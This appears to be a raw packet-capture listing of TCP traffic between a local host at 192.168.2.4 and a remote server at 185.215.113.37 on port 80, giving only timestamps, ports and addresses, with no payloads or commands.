Sep 26, 2024 22:40:18.924401045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924427986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924436092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924443960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924462080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924468040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924479008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924488068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924498081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924511909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924529076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924544096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924545050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924561024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924576998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924593925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924593925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924622059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924623013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924642086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924690008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924705982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924721956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924737930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924753904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924756050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924768925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924783945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924793959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924803019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924810886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924823046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924829960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924839973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924849033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924864054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924889088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924889088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924909115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924922943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924940109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924957991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924972057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924976110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924993992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.924998999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.924998999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925010920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925019026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925029039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925035954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925054073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925055981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925076962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925091982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925095081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925110102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925122976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925138950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925146103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925154924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925170898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925172091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925189972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925198078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925209045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925215960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925228119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925234079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925251007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925256014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925256968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925271034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925276041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925292969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925293922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925312042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925316095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925328970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925339937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925359011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925360918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925375938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925390959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925393105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925411940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925432920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925455093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925894976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925910950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925936937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925951958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925962925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925967932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.925987005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.925995111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.926012993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.926017046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.926028013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.926038027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.926047087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.926060915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.926078081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.926098108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.926912069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.926925898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.926989079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927048922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927064896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927081108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927098036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927129030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927217960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927232981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927252054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927279949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927283049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927309036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927325010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927328110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927328110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927344084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927349091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927361012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927375078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927376986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927412987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927416086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927412987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927434921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927438021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927450895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927464008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927474976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927484035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927490950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927504063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927510023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927525043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.927531004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927531004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927553892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.927568913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.051182032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.051312923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.051328897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.051345110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.051450014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.051450968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052479982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052516937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052532911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052665949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052683115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052685976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052686930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052686930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052697897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052725077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052735090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052757978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052759886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052778006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052814960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052826881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052867889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.052911043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052930117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052947998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.052978992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.053015947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.053025007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.053113937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.053710938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.053752899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.053770065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.053786039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.053813934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.053845882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054019928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054035902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054064035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054069996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054080963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054092884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054110050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054110050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054126024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054126978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054147005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054152966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054172993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054173946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054192066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054193020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054208994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054219007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054229021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054235935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054244041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054255962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054263115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054276943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054328918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054330111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054330111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054425001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054439068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054455996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054472923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054488897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054495096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054495096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054507017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054517031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054534912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054534912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054553032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054553986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054569960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054579020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054588079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054595947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054606915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054626942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054627895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054630995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054646969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054651976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054676056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054677010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054693937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054694891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054712057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054759979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054773092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054778099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054790020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054837942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054847956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054863930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054878950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054894924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054897070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054912090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054915905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054929018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054934978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.054970026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054970026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.054989100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055012941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055028915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055046082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055061102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055075884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055078030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055094004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055095911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055116892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055131912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055133104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055150032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055151939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055167913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055175066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055183887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055197954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055221081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055259943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055274963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055290937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055308104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055322886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055325031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055340052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.055357933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055357933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.055419922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056509972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056548119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056562901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056565046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056591034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056612015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056612015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056628942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056644917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056662083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056679010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056691885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056698084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056708097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056720018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056724072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056740999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056741953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056765079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056766033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056766033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056781054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056786060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056797981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056806087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056816101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056826115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056834936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056849003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056850910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056850910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056868076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.056873083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056886911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.056905985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.119055986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.119074106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.119091988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.119184971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.119251966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.119252920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.119252920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.180376053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.180396080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.180413008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.180430889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.180609941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.180610895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.180610895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.181718111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.181745052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.181763887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.181780100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.181797028 CEST	80	49730	185.215.113.37	192.168.2.4
